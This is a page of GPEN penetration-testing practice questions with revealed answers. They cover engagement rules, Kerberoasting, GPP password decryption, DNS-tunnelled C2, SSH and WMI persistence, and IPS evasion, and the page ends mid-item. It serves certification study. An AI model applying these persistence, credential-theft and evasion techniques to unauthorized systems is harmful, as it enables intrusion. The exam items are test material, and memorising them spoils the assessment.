Courseiva

GIAC Penetration Tester (GPEN) — Questions 1–75

298 questions total · 4pages · All types, answers revealed

Page 1 of 4

Page 2
1
MCQhard

Refer to the exhibit. What is the most likely cause of the 'Connection reset by peer' error when using the PsExec module?

A.The SMB credentials provided are incorrect
B.The listener port is blocked by the target firewall
C.Endpoint security or a firewall terminated the SMB connection
D.The payload architecture does not match the target
AnswerC

This specific error code in the context of PsExec often signals that a security product or the Windows firewall identified the suspicious activity of installing a service remotely and terminated the SMB connection to prevent further compromise, which is standard behavior for modern EDR solutions in a secure environment.

Why this answer

The error 'Connection reset by peer' during a PsExec exploit attempt usually indicates that an active security control, such as a host-based firewall or endpoint protection, terminated the connection. PsExec relies on the Admin$ share and the service control manager. If the target system detects the service installation attempt or the connection from an unauthorized source, it will forcefully drop the connection to block the exploitation attempt, a common scenario in hardened enterprise environments.

Exam trap

Candidates often assume the error is due to a syntax error in the Metasploit module or an invalid payload, ignoring the reality of host-based security blocking SMB administrative shares.

2
MCQeasy

A client asks you to perform a penetration test on their internal network. During the planning phase, they provide you with a list of IP addresses and ask you to sign a document that limits your testing to those addresses. Which of the following best describes the purpose of this document?

A.It is a liability waiver that absolves the tester of any responsibility for system damage.
B.It is a service level agreement outlining the expected uptime of the target systems during testing.
C.It defines the scope of the engagement and legally authorizes testing only on the specified targets.
D.It serves as a non-disclosure agreement to protect the client's confidential information.
AnswerC

This document is a scope agreement and authorization letter. It ensures that the tester only targets the agreed-upon IP addresses, protecting both parties legally. Testing outside this scope could be considered unauthorized access, even if the client verbally approved a broader range. It is a fundamental component of the Rules of Engagement.

Why this answer

The document is a scope and authorization agreement. It legally permits testing only on specified IP addresses and protects both parties by clearly defining what is allowed. Without it, testing could be deemed unauthorized, leading to legal consequences.

Exam trap

The trap here is confusing a scope authorization document with other legal agreements like NDAs or liability waivers, which serve different purposes.

3
MCQhard

During the planning phase of a penetration test for a multinational corporation, you discover that the client's legal department requires all testing activities to comply with the laws of each country where their offices are located. The client has offices in Germany, Brazil, and Japan. Which of the following is the MOST important consideration when planning the engagement?

A.Perform all testing from a central location in the client's home country to avoid international legal issues.
B.Use only automated tools that are approved by the client's legal department in each country.
C.Obtain a single global authorization letter from the client's headquarters that covers all offices.
D.Ensure that testing does not violate any local laws regarding unauthorized access, even if the client has authorized it.
AnswerD

In some countries, unauthorized access laws may apply even with client authorization if the tester is not physically present or if the authorization does not meet local legal requirements. For example, Germany has strict computer crime laws. Testing must be planned to comply with each jurisdiction's legal framework to avoid criminal liability for the tester and the client.

Why this answer

The most important consideration is ensuring that testing activities comply with the local laws of each country where targets reside. Client authorization does not override local criminal laws. A thorough legal review and, if necessary, local legal counsel are essential to avoid criminal liability.

Exam trap

The trap here is assuming that a single authorization letter or centralized testing location can bypass the need to comply with diverse international laws.

4
MCQmedium

When analyzing C2 traffic, which characteristic of a TLS/SSL certificate is most indicative of a potentially malicious beaconing endpoint?

A.The certificate uses a 2048-bit RSA key.
B.The certificate is signed by a reputable public CA.
C.The certificate uses a self-signed or invalid chain.
D.The certificate includes a valid Subject Alternative Name.
AnswerC

Self-signed certificates are common in rapid-deployment C2 infrastructure because they are easy to generate and cost nothing. While they trigger warnings in a browser, malware can be configured to ignore these warnings, making them a telltale sign of non-standard, likely malicious, backend communication infrastructure.

Why this answer

Malicious C2 infrastructure often uses self-signed certificates or certificates issued by untrusted/free Certificate Authorities to encrypt traffic. In a professional environment, legitimate services typically use well-known, trusted CAs. When a penetration tester sees an endpoint using a certificate with a random common name, short expiration period, or invalid chain, it serves as a strong indicator that the connection is intended for unauthorized command and control purposes.

Exam trap

Candidates often overthink technical details like cipher suites or TLS versions. They miss the most obvious red flag: the lack of a trusted, verifiable certificate chain for a production-facing endpoint.

5
Multi-Selectmedium

You are performing a penetration test against a web server that is protected by a network-based intrusion prevention system (IPS). You need to conduct a port scan while minimizing the chance of being blocked. Which two Nmap options should you use to evade the IPS? (Choose two.)

Select 2 answers
A.Use -T0 or -T1 to slow down the scan.
B.Use -D RND:10 to decoy the scan.
C.Use -O to enable OS detection.
D.Use -A to enable aggressive scan options.
E.Use -sV to enable version detection.
AnswersA, B

The -T0 (Paranoid) and -T1 (Sneaky) timing templates drastically reduce the scan speed, sending packets with long delays between them. This makes the scan traffic less likely to trigger rate-based IPS signatures, which often flag rapid port scans. Slowing down is a classic evasion technique that helps avoid detection by network security devices.

Why this answer

To evade an IPS during a port scan, slowing down the scan with -T0 or -T1 and using decoys with -D RND:10 are effective techniques. These methods reduce the scan's signature and make it harder for the IPS to correlate the activity to a single source, thereby minimizing the risk of being blocked.

Exam trap

The trap here is thinking that adding more scan features like version or OS detection will help evade detection, when they actually increase the scan's footprint.

6
MCQhard

During an internal assessment, a tester uses the auxiliary scanner auxiliary/scanner/smb/smb_version and receives the result 'Host is running Windows Server 2016'. The tester then selects exploit/windows/smb/ms17_010_eternalblue but the exploit reports 'The target is not vulnerable'. Which Metasploit feature should the tester use to determine why the exploit check failed and what SMB dialect the target actually supports?

A.Run the exploit module's check method and then inspect the module's verbose output for the SMB dialect and error details
B.Switch to auxiliary/scanner/smb/smb_ms17_010 and review its output
C.Use the smb_version scanner with the SMB2 option disabled to force SMB1 negotiation
D.Run the exploit with the ForceExploit advanced option set to true
AnswerA

Metasploit exploit modules implement a check method that returns a vulnerability status and often prints detailed diagnostic messages when Verbose is enabled. Running check and reviewing the verbose output reveals the SMB dialect negotiated and the specific reason the check failed, such as a missing patch or unsupported dialect. This directly answers both what dialect is in use and why the exploit check failed.

Why this answer

Exploit modules include a check method that returns a status and, with Verbose enabled, prints the negotiated SMB dialect and the reason the target failed the vulnerability test. Running check and reading that output directly explains the mismatch between the scanner result and the exploit check. Forcing the exploit or running another scanner does not surface the underlying diagnostic detail.

Exam trap

The trap here is believing a version scanner's output is sufficient to predict exploit success, when the exploit's own check method provides the dialect and failure reasons needed for diagnosis.

7
Multi-Selectmedium

You are drafting the Rules of Engagement (RoE) for a penetration test of a client's internal network. The client wants to ensure that the engagement is legally sound and that all parties understand their responsibilities. Which TWO of the following items are essential to include in the RoE? (Choose two.)

Select 2 answers
A.Explicit written authorization from the client to perform the test.
B.A statement of work (SOW) detailing the deliverables and timeline.
C.Emergency contact information for both the client and the testing team.
D.A list of all vulnerabilities that will be tested.
E.The specific tools and techniques that will be used during the test.
AnswersA, C

Written authorization is a legal necessity to protect the tester from liability and to prove that the client consented to the testing. It should specify the scope, time frame, and any limitations. Without it, the tester could be considered to be conducting unauthorized access, which is illegal. This is a fundamental element of the Rules of Engagement and is required for any professional penetration test.

Why this answer

The two essential items are explicit written authorization and emergency contact information. Written authorization provides legal protection and confirms consent, while emergency contacts ensure rapid response to incidents. These elements are fundamental to a legally sound and operationally safe penetration test, distinguishing the RoE from other planning documents.

Exam trap

The trap here is confusing the Rules of Engagement with a Statement of Work or a technical testing plan, leading to inclusion of non-essential items.

8
MCQeasy

A penetration tester has captured a password hash from a Linux system and identifies it as a SHA-512 crypt hash. Which Hashcat mode should be used to crack this hash?

A.Mode 500 (md5crypt, MD5(Unix))
B.Mode 1800 (sha512crypt, SHA512(Unix))
C.Mode 7400 (sha256crypt, SHA256(Unix))
D.Mode 3200 (bcrypt)
AnswerB

SHA-512 crypt hashes are commonly found in /etc/shadow on Linux systems and are identified by the $6$ prefix. Hashcat mode 1800 is specifically designed to crack these hashes. Since the scenario involves a SHA-512 crypt hash, mode 1800 is the correct choice for an efficient and successful cracking attempt.

Why this answer

Linux systems often store password hashes in /etc/shadow using SHA-512 crypt, identified by the $6$ prefix. Hashcat mode 1800 is the correct mode to crack these hashes. Other modes like 500, 3200, or 7400 target different algorithms and would not successfully crack the SHA-512 crypt hash, leading to wasted effort.

Exam trap

The trap here is confusing SHA-512 crypt with other Unix crypt variants like MD5, bcrypt, or SHA-256 crypt, which have different prefixes and require different Hashcat modes.

9
MCQmedium

During an internal assessment, a tester has valid domain credentials for a standard user and captures Kerberos traffic with Wireshark. The tester notices several TGS-REQ packets for service principal names ending in "/MSSQLSvc" across multiple hosts. The tester wants to identify which accounts are vulnerable to offline password cracking without triggering account lockouts. Which action should the tester take next?

A.Run BloodHound with the collection method All to map SPN relationships and infer which accounts use weak passwords.
B.Perform an AS-REP Roasting scan against all domain users to collect encrypted pre-authentication responses.
C.Use Rubeus with the kerberoast action to request TGS tickets for the MSSQLSvc SPNs and save the extracted hashes for offline cracking.
D.Attempt to authenticate to each MSSQLSvc SPN using the compromised user's credentials to confirm access.
AnswerC

Requesting TGS tickets for accounts with registered SPNs returns the service ticket encrypted with the target account's NTLM hash, which can be cracked offline without contacting the target service. Rubeus kerberoast automates this extraction and produces a hashcat-compatible format. The compromised user only needs a valid TGT, so no lockout risk is introduced against the service account.

Why this answer

Requesting service tickets for accounts with registered SPNs yields TGS material encrypted with the service account's key, enabling offline cracking without lockout risk. The captured TGS-REQ traffic for MSSQLSvc SPNs confirms kerberoastable targets. Tools like Rubeus automate extraction and output hashcat-compatible hashes, letting the tester verify weak service account passwords safely.

Exam trap

The trap here is confusing kerberoasting with interactive service authentication or AS-REP Roasting, when the observed TGS-REQ traffic points specifically to extracting TGS tickets for offline cracking.

10
MCQmedium

A penetration tester is using Nessus to scan a large subnet and needs to avoid overwhelming older printers that are known to crash when too many simultaneous connections are made. The tester also wants to ensure the scan completes in a reasonable timeframe. Which Nessus scan policy setting should be adjusted to control the number of simultaneous hosts being scanned?

A.Reduce parallel checks per host
B.Scan window size
C.Max concurrent hosts
D.Max concurrent checks per host
AnswerC

Max concurrent hosts determines how many hosts are scanned at the same time. By reducing this value, the tester limits the number of devices being probed simultaneously, which directly lowers the risk of overwhelming fragile printers. It also helps manage overall network load while still allowing the scan to proceed efficiently.

Why this answer

The Max concurrent hosts setting directly controls how many hosts are scanned at the same time. Lowering this value ensures that fewer devices are probed concurrently, reducing the chance of crashing sensitive equipment like older printers. It balances scan speed with safety, making it the appropriate adjustment for the scenario.

Exam trap

The trap here is confusing per-host concurrency limits with global host concurrency, leading to a setting that doesn't actually reduce the number of simultaneous targets.

11
MCQmedium

Which of the following is a classic characteristic of 'beaconing' behavior observed in C2 traffic?

A.High-volume data exfiltration during business hours.
B.Consistent, periodic intervals between connections.
C.Randomized connections to various global IP addresses.
D.Traffic that exclusively utilizes UDP transport.
AnswerB

Beaconing relies on periodic check-ins to ensure the malware maintains its connection to the C2 server. This regularity, even if jitter is present, creates a distinct statistical signature in network traffic logs, allowing security analysts to identify compromised hosts that are systematically calling out to an external C2 node.

Why this answer

Beaconing is characterized by the repeated, predictable nature of the connection attempts from a compromised host to an external server. By analyzing network traffic, one can identify these 'heartbeats' that occur at fixed intervals. This pattern is often the first red flag that a system has been compromised, as legitimate user activity is typically irregular and bursty compared to the methodical, automated nature of a C2 beacon.

Exam trap

Candidates often confuse 'beaconing' with 'data exfiltration' or 'bursty traffic'. They fail to recognize that the defining characteristic of beaconing is the predictable, rhythmic timing of the connection attempts.

12
MCQmedium

During an authorized penetration test, you compromise a Windows host in a restricted network segment that only permits outbound DNS (UDP 53) to an internal resolver. You need to establish a command-and-control channel that can survive reboots and provide interactive shell access while blending with normal DNS traffic. Which of the following is the MOST appropriate technique to achieve this?

A.Use a DNS TXT record to store commands, and have the compromised host poll a public DNS server directly on UDP 53, bypassing the internal resolver.
B.Use a reverse TCP Meterpreter payload over port 443 with TLS, and rely on the firewall's deep packet inspection to allow it as HTTPS.
C.Use an ICMP tunnel such as ptunnel to encapsulate shell traffic in echo requests, and configure a registry run key for persistence.
D.Use a DNS tunneling tool such as dnscat2, configure it with a domain you control, and set up a scheduled task to restart the client on boot.
AnswerD

DNS tunneling encapsulates arbitrary data within DNS queries and responses, allowing interactive shell access over UDP 53. Since the network only allows DNS to an internal resolver, dnscat2 can still reach its external server if the resolver performs recursive lookups. Persistence via scheduled task ensures the channel re-establishes after reboot. This combination directly addresses the constraints.

Why this answer

The scenario requires a C2 channel that works over DNS only, supports interactive shell, and survives reboots. DNS tunneling via dnscat2 meets these requirements because it encapsulates data in DNS queries and responses, which are allowed. Persistence via scheduled task ensures the client restarts after a reboot.

The other options either violate the allowed protocol (TCP/443, ICMP) or attempt to bypass the internal resolver, which is not permitted.

Exam trap

The trap here is assuming that any outbound connection can be tunneled over DNS, but the key constraint is that only DNS to an internal resolver is allowed, so direct public DNS or other protocols are blocked.

13
MCQhard

During a Windows assessment you obtain a low-privileged domain user's credentials. Enumeration reveals a Group Policy Preference file on a readable SYSVOL share containing a cpassword value. What is the most effective next step to escalate privileges?

A.Decrypt the cpassword value using the publicly known AES key and authenticate as the account it protects.
B.Crack the cpassword value with hashcat using the NTLM hash mode.
C.Relay the cpassword value to an SMB service to obtain a session on a file server.
D.Use the cpassword value directly in a pass-the-hash authentication against a domain controller.
AnswerA

Group Policy Preferences stored credentials in cpassword fields encrypted with a static AES key that Microsoft published in MS14-025 documentation. Tools such as gpp-decrypt recover the plaintext instantly, and the recovered credential often belongs to a privileged account. Because the key is fixed and public, no cracking is required, making decryption the direct and effective escalation step.

Why this answer

Credentials in Group Policy Preferences were encrypted with a static AES key that Microsoft published, so a cpassword value found on SYSVOL can be decrypted immediately with tools like gpp-decrypt. The recovered plaintext often belongs to a privileged account, and because no cracking or protocol interaction is required, decryption is the fastest route to privilege escalation from the low-privileged credentials already held.

Exam trap

The trap here is treating the cpassword value as a hash that must be cracked or relayed, when it is reversibly encrypted with a public key.

14
Multi-Selectmedium

Which TWO of the following scenarios are most indicative of a successful Kerberoasting attack occurring within a network?

Select 2 answers
A.Multiple TGS-REQ packets from a single workstation targeting various SPNs within a short timeframe.
B.A sudden spike in AS-REQ events using expired Kerberos TGTs.
C.The use of RC4-HMAC encryption in service ticket requests for accounts that support AES.
D.Frequent failed logins followed by a successful Kerberos authentication.
E.An influx of TGT-REQ packets originating from non-domain controllers.
AnswersA, C

A high volume of TGS-REQ requests from a single source is a hallmark of Kerberoasting, as the attacker attempts to collect multiple tickets to maximize their chances of cracking service account passwords. This behavioral pattern is distinct from normal network activity where users typically request tickets incrementally.

Why this answer

Kerberoasting is characterized by the bulk request of service tickets and the subsequent offline cracking of the service account's password. Detectors look for anomalous TGS-REQ volume and specific encryption types (like RC4-HMAC) in the requests. Identifying these patterns allows security analysts to pinpoint service accounts that are currently under attack, enabling timely password resets or the implementation of Group Managed Service Accounts (gMSAs) to mitigate future risk.

Exam trap

Candidates often confuse Kerberoasting indicators with AS-REP roasting indicators, mistakenly looking for pre-authentication disabled flags instead of high-volume TGS-REQ packets and weak encryption types.

15
MCQeasy

During the reconnaissance phase of a penetration test, you are examining a target's public-facing web application. You notice that the application returns detailed error messages that include full file paths and database query snippets. Which of the following best describes the primary risk associated with this finding?

A.It causes the application to crash, leading to a denial of service
B.It allows attackers to perform cross-site scripting (XSS) attacks
C.It enables attackers to bypass authentication mechanisms
D.It provides attackers with information that can be used to craft more targeted attacks
AnswerD

Detailed error messages reveal internal file paths, database structure, and query logic, which are valuable for an attacker. This information can be used to identify the technology stack, locate vulnerabilities, and craft precise exploits. For example, knowing the database type and version can help tailor SQL injection payloads. This is a classic information disclosure vulnerability that aids reconnaissance.

Why this answer

Detailed error messages are an information disclosure vulnerability. They reveal internal paths, database queries, and technology details that attackers can use to map the application and plan further attacks. This information is valuable for reconnaissance and can significantly reduce the effort required to exploit other vulnerabilities.

Exam trap

The trap here is assuming that verbose errors directly cause a specific exploit like XSS or authentication bypass, when the real issue is the information leak that enables those attacks.

16
Multi-Selecthard

When conducting an advanced credential harvesting assessment against an Active Directory environment, a penetration tester attempts Kerberoasting. Which TWO actions or conditions are required to successfully extract and crack service tickets using this technique? (Choose TWO)

Select 2 answers
A.Possession of a standard domain user account to request service tickets from the Key Distribution Center.
B.Direct administrative access to the primary Domain Controller file system to steal the NTDS.dit database.
C.An active session running specialized exploitation tools on the specific host running the target service.
D.Offline brute-force cracking of the captured Ticket Granting Service ticket using tools like Hashcat or John the Ripper.
E.Unconstrained Kerberos delegation configured specifically on the local workstation operating system.
AnswersA, D

Any authenticated domain user possesses the rights to request a Ticket Granting Service ticket for any valid Service Principal Name registered in Active Directory. This core protocol design feature allows standard low-privilege accounts to initiate the Kerberoasting attack chain.

Why this answer

Kerberoasting requires requesting a Ticket Granting Service ticket for any domain user account associated with a Service Principal Name, followed by offline cracking since the ticket is encrypted with the service account password hash. GPEN testers leverage this to extract credentials without touching the target server directly.

Exam trap

Many students incorrectly assume that administrative domain credentials are required to request service tickets, forgetting that any standard domain user account can request SPN tickets by design.

17
MCQmedium

During a penetration test, you gain access to a server and want to add a new SSH key for persistent access. Where should you place the key in the user's home directory?

A.~/.ssh/known_hosts
B.~/.ssh/authorized_keys
C./etc/ssh/ssh_config
D./etc/shadow
AnswerB

The authorized_keys file contains the public keys allowed to authenticate for a given user account. By adding a key here, you create a persistent access point. The file and the ~/.ssh directory must have correct permissions (e.g., 600 for the file) for the SSH daemon to accept the key.

Why this answer

The ~/.ssh/authorized_keys file is the standard location for SSH public keys. By appending a public key to this file, an attacker can log in via SSH using the corresponding private key without needing a password. This is a common, reliable, and stealthy persistence method on Linux systems that allows for repeated, automated access to the compromised server throughout the duration of the test.

Exam trap

Candidates often suggest placing keys in the user's home directory root or a random folder, forgetting that SSH specifically requires the .ssh directory and authorized_keys file to function.

18
MCQmedium

Why does the Kerberos 'PAC' (Privilege Attribute Certificate) pose a security risk in the context of ticket forgery attacks?

A.The PAC is always encrypted with the user's password, making it easy to crack.
B.The PAC allows attackers to inject arbitrary group memberships into a forged ticket.
C.The PAC prevents the KDC from verifying the ticket's signature.
D.The PAC is required for TGT requests, making it a primary target for sniffers.
AnswerB

In a forgery scenario, the attacker controls the entire ticket construction, including the PAC. By modifying the PAC data, the attacker can grant themselves administrative group memberships, effectively becoming a domain administrator as far as any service accepting the ticket is concerned, regardless of their real identity.

Why this answer

The PAC is a data structure embedded within Kerberos tickets that contains user identity and group membership information. Because the PAC is signed by the KDC, it is normally trusted. However, if an attacker can forge a ticket, they can also manipulate the PAC within that ticket to elevate their privileges, such as adding themselves to the 'Domain Admins' group, bypassing normal authorization checks completely.

Exam trap

Test-takers frequently believe the PAC is verified directly by client machines or member servers without KDC validation, misunderstanding where authorization data is processed and trusted.

19
MCQmedium

Which of the following describes the purpose of 'encoding' shellcode in an exploitation context?

A.To increase the execution speed of the exploit.
B.To bypass character-based filters and detection systems.
C.To encrypt the traffic for legal compliance.
D.To permanently store the payload on the target's disk.
AnswerB

Security systems often scan for known shellcode patterns or restricted characters like null bytes (0x00). Encoding the payload allows it to pass through these filters by obfuscating the malicious bytes into a benign-looking format, which is later decoded by a small stub upon reaching memory.

Why this answer

Encoding is used to transform shellcode to bypass security filters, such as Intrusion Detection Systems (IDS) or character filtering (like null bytes). By changing the signature of the payload, it avoids triggering pattern-based detection. This is a fundamental technique for ensuring the payload reaches its intended execution point without being sanitized or blocked by input validation controls that inspect data for known malicious sequences.

Exam trap

Candidates frequently confuse shellcode encoding with encryption, assuming it provides confidentiality against analysts rather than modifying bytes to bypass character filters.

20
Multi-Selectmedium

A penetration tester is preparing to run a credentialed vulnerability scan against a mixed environment of Windows Server 2019 and Ubuntu 20.04 hosts on an internal /24 subnet. The tester wants to reduce scan duration and network load while still detecting missing patches and misconfigurations. Which two scanning techniques should the tester implement to achieve these goals? (Choose two.)

Select 2 answers
A.Use SSH and SMB credentials to allow the scanner to query the local patch database and installed software inventory.
B.Configure the scanner to perform a SYN stealth scan on all 65,535 TCP ports for every host before authenticating.
C.Limit the scan to a predefined list of common ports and disable all plugin families except 'Denial of Service'.
D.Enable local security checks on the scan policy and provide administrative credentials for each target.
E.Set the scanner to use a very aggressive timing template to maximize parallelism across all hosts.
AnswersA, D

Providing SSH and SMB credentials enables authenticated checks that query local patch databases and software inventories directly. This yields accurate detection of missing patches and misconfigurations while minimizing network probes, thereby reducing scan duration and load. It is a core technique for credentialed scanning in mixed Windows and Linux environments.

Why this answer

Credentialed scanning with local security checks is the most efficient way to detect missing patches and misconfigurations while minimizing network traffic and scan time. Supplying administrative credentials for Windows and SSH credentials for Linux allows the scanner to read local patch databases and software inventories directly, avoiding extensive remote probing. This approach improves accuracy and reduces load compared to unauthenticated or overly aggressive scanning methods.

Exam trap

The trap here is assuming that increasing scan aggressiveness or port coverage will speed up results, when in fact credentialed local checks are what reduce duration and network load while improving patch detection.

21
MCQmedium

A penetration tester has obtained a low-privileged domain user's cleartext credentials. During reconnaissance, the tester wants to enumerate which accounts in the domain are configured with Service Principal Names (SPNs) and are therefore candidates for Kerberoasting, without triggering a lockout or modifying the directory. Which of the following approaches best accomplishes this?

A.Perform an SMB null session against each domain controller and parse the SAM database for accounts ending in the $ suffix.
B.Run a targeted LDAP query for objects where servicePrincipalName is present and not null, using tools such as GetUserSPNs.py or PowerView's Get-DomainUser -SPN.
C.Send an AS-REQ for every account in the domain and inspect which accounts return a pre-authentication error versus a valid AS-REP.
D.Request a TGS for the krbtgt service and inspect the returned ticket's encryption type to infer which accounts have SPNs.
AnswerB

Querying the directory for objects with a non-null servicePrincipalName attribute returns exactly the accounts eligible for Kerberoasting. This read-only LDAP operation requires only standard authenticated access, does not modify the directory, and does not generate failed logon events that could cause lockouts, making it the correct enumeration technique in this scenario.

Why this answer

Kerberoasting requires identifying domain accounts that have a servicePrincipalName set, because those accounts can have a service ticket requested and cracked offline. The cleanest way to find them is a read-only LDAP search filtering on servicePrincipalName. This technique uses only legitimate authenticated access, avoids lockout risk, and does not alter the directory, making it the appropriate reconnaissance step.

Exam trap

The trap here is confusing AS-REP Roasting (accounts without pre-authentication) with Kerberoasting (accounts with SPNs), which are entirely different account configurations.

22
MCQmedium

During a penetration test, you successfully exploit a web application via SQL injection. You want to use this access to achieve remote code execution (RCE) on the underlying Windows database server. Which feature should you look for to facilitate this?

A.Database backup functionality
B.Stored procedure execution via xp_cmdshell
C.Database triggers on update
D.Database user enumeration
AnswerB

xp_cmdshell is a powerful stored procedure in Microsoft SQL Server that spawns a Windows command shell and passes in a command string for execution. It is the primary target for testers attempting to escalate from SQL injection to remote code execution on the underlying database server host.

Why this answer

Database features like 'xp_cmdshell' in Microsoft SQL Server allow for the execution of arbitrary operating system commands from within a SQL query. If the database service account has sufficient privileges, this allows an attacker to pivot from SQL injection to full system command execution. Checking for this feature is a critical step in escalating database access to server-level administrative control.

Exam trap

Candidates often look for generic web shell upload methods instead of focusing on native database administrative features specific to Microsoft SQL Server like xp_cmdshell.

23
MCQmedium

You are performing a network audit and need to identify live hosts across a segmented network while minimizing the risk of triggering IDS alerts. Which Nmap technique is most appropriate for stealthy host discovery in a subnet where ICMP echo requests are filtered by the firewall?

A.Perform a standard ICMP echo sweep (-PE).
B.Execute a full TCP connect scan on all ports (-sT).
C.Utilize TCP SYN ping (-PS) on common service ports.
D.Run an ARP scan across the entire subnet (-PR).
AnswerC

TCP SYN ping sends a SYN packet to common ports, effectively bypassing ICMP-only filters. Because it does not complete a full three-way handshake, it is significantly stealthier than a full TCP connect scan. This technique is a standard industry method for host discovery in hardened, filtered network environments.

Why this answer

Nmap's TCP SYN ping (-PS) is highly effective because it sends a small SYN packet to specified ports, like 80 or 443, which are typically open or acknowledged by firewalls. This bypasses ICMP filters while mimicking legitimate traffic. Understanding how to circumvent basic perimeter defenses is critical for penetration testers to ensure comprehensive discovery without alerting security systems that monitor for common ICMP-based scanning patterns or heavy traffic floods.

Exam trap

Candidates often select ICMP-based discovery methods, forgetting that firewalls frequently block ICMP, which makes TCP SYN ping a more reliable and stealthy alternative for host discovery in segmented networks.

24
MCQmedium

Which of the following describes the function of the 'msfvenom' tool within the Metasploit ecosystem?

A.To act as a central vulnerability database
B.To automate the exploitation of remote services
C.To generate and encode custom payloads
D.To manage active sessions and post-exploitation
AnswerC

Msfvenom allows for the creation of various payload types while applying encoding techniques to modify the binary signature. This is a crucial task for penetration testers who need to evade simple signature-based security controls by creating unique, obfuscated payloads that are less likely to be detected by traditional antivirus software.

Why this answer

Msfvenom combines the functionality of the old 'msfpayload' and 'msfencode' tools. It is used to generate standalone, malicious payloads for a variety of platforms. Understanding how to generate custom shellcode is essential for penetration testers who need to tailor their delivery mechanism to bypass specific security controls, such as application whitelisting or signature-based antivirus, which often block default, well-known Metasploit payload binaries.

Exam trap

Candidates often confuse msfvenom with the Metasploit exploit modules themselves. They mistakenly believe it is used for scanning or post-exploitation, rather than solely for payload generation and encoding.

25
MCQmedium

You are performing a penetration test and discover a service running as SYSTEM that is vulnerable to DLL hijacking. What is the most appropriate action to take to ensure the test is successful and safe?

A.Immediately drop a reverse shell.
B.Use a benign DLL to prove execution.
C.Reboot the server to force the service to restart.
D.Modify the Windows Registry to disable the service.
AnswerB

Using a benign DLL that launches a non-critical application or writes to a log file is the safest way to demonstrate the vulnerability. It proves code execution with SYSTEM privileges without causing service instability or creating a persistent backdoor that could be misused if detected by third parties.

Why this answer

DLL hijacking involves placing a malicious DLL in a directory that a process searches before the legitimate DLL. To do this safely, you must ensure the DLL does not crash the service, which would cause a denial of service. Using a benign payload, such as one that launches a notepad process or logs a specific action, confirms the vulnerability without disrupting the client's business operations.

Exam trap

Candidates often rush to deploy full reverse shell payloads during DLL hijacking, risking service crashes and unintended denial of service on high-privilege system applications.

26
Multi-Selecthard

During OSINT gathering, you are investigating a target's presence on social media and professional networking sites. Which TWO of the following methods are effective for gathering metadata about employees to facilitate future social engineering attacks?

Select 2 answers
A.Extracting EXIF data from public photos
B.Performing a brute-force attack on the corporate firewall
C.Analyzing LinkedIn profiles for job descriptions and software stack mentions
D.Conducting a port scan of the internal network
E.Directly calling the IT helpdesk to request employee email addresses
AnswersA, C

Photos uploaded to social media or corporate blogs often contain EXIF metadata, including GPS coordinates and device hardware details. This data can reveal an employee's daily habits, office location, or preferred hardware, providing a wealth of information for planning physical access attacks or tailoring social engineering lures to the specific environment.

Why this answer

OSINT activities focus on harvesting publicly available information to profile individuals within an organization. By analyzing professional profiles and image metadata, an attacker gains insight into corporate hierarchies and technical stacks. This information is vital for crafting targeted phishing campaigns or pretexting scenarios.

Understanding how to extract this data demonstrates a comprehensive approach to reconnaissance by focusing on the 'human' element alongside technical network infrastructure.

Exam trap

Candidates often select technical network scans instead of social networking and metadata methods, forgetting that social engineering requires gathering human and contextual data rather than just finding open ports.

27
MCQmedium

During a penetration test, a tester compromises a workstation and extracts a Kerberos TGT for a domain user from memory. The tester wants to use this TGT to access a file share on a remote server without knowing the user's password. Which action should the tester take?

A.Perform an S4U2Self request to obtain a service ticket for the file share using the extracted TGT.
B.Forge a new TGT using the user's NTLM hash, which can be derived from the extracted TGT.
C.Crack the TGT offline to recover the user's password, then authenticate normally to the file share.
D.Inject the TGT into the current session using Rubeus ptt and request a service ticket for the file share's SPN.
AnswerD

Pass-the-ticket involves injecting a stolen TGT into a logon session so the system can request service tickets on behalf of the user. With the TGT injected, the tester can obtain a TGS for the file share's SPN and access it without the password. Rubeus ptt performs the injection, and the resulting TGS enables authenticated access.

Why this answer

Injecting a stolen TGT into the current session allows the system to request service tickets as the compromised user, enabling access to resources like file shares without the password. Pass-the-ticket leverages the TGT's validity until expiration, making it a powerful lateral movement technique.

Exam trap

The trap here is assuming a TGT can be cracked or used to derive the user's hash, when it must instead be injected into a session to request service tickets.

28
MCQmedium

A software-as-a-service provider engages your team for a penetration test of its production environment. The client wants testing to occur during business hours so its engineers can observe. Which planning consideration is MOST important to address in the Rules of Engagement before testing begins?

A.Requiring the testers to sign a new non-disclosure agreement specific to this engagement.
B.Establishing a rollback and emergency stop procedure in case testing causes service degradation for live customers.
C.Confirming that the testers will use only open-source tools to avoid licensing disputes.
D.Scheduling the test to coincide with a major marketing campaign to maximize visibility of the security investment.
AnswerB

Testing a production SaaS environment during business hours risks impacting live customers if an exploit triggers instability. Defining rollback steps and an emergency stop procedure gives both parties a clear protocol to halt testing quickly and restore service. This is the most critical planning element because it directly protects the provider's customers and limits business impact from authorized testing activity.

Why this answer

When testing a live SaaS production environment during business hours, the greatest risk is unintended customer impact. The Rules of Engagement must define rollback steps, an emergency stop procedure, and clear communication channels so testing can be halted immediately if service degrades. This protects customers and limits the provider's exposure while still allowing the client's engineers to observe the testing.

Exam trap

The trap here is prioritizing administrative items such as tool licensing or additional non-disclosure agreements over the operational safeguards that actually protect live customers during production testing.

29
MCQmedium

You are conducting a penetration test for a client and need to enumerate subdomains of example.com to map their external attack surface. During this reconnaissance phase, you decide to use a tool that performs DNS zone transfers. Which of the following is the most appropriate tool to attempt a DNS zone transfer?

A.traceroute
B.dig
C.nmap
D.whois
AnswerB

dig is a flexible DNS lookup utility that can perform zone transfers using the AXFR query type. By running 'dig axfr @nameserver example.com', you can attempt to retrieve the entire zone file if the nameserver is misconfigured to allow transfers. This directly aligns with the reconnaissance goal of mapping subdomains.

Why this answer

The dig tool is specifically designed for DNS queries and supports the AXFR query type needed for zone transfer attempts. A successful zone transfer can reveal all DNS records, including subdomains, which is invaluable for mapping the target's external footprint. The other tools serve different reconnaissance purposes and cannot perform this function.

Exam trap

The trap here is assuming that any network reconnaissance tool can perform DNS zone transfers, but only dedicated DNS query tools like dig or host are appropriate for this task.

30
MCQmedium

Which technique is most effective for maintaining persistence on a Windows domain-joined machine while remaining stealthy by avoiding common registry keys?

A.Adding a startup shortcut to the All Users Startup folder.
B.Creating a WMI event subscription for system events.
C.Modifying the existing service binary to include a backdoor.
D.Running a scheduled task with a visible command prompt window.
AnswerB

WMI event subscriptions allow attackers to execute code when specific system conditions are met. Because these subscriptions are stored in the WMI repository rather than standard registry keys, they evade basic persistence checks, making them a highly effective and stealthy method for maintaining long-term access to a Windows system.

Why this answer

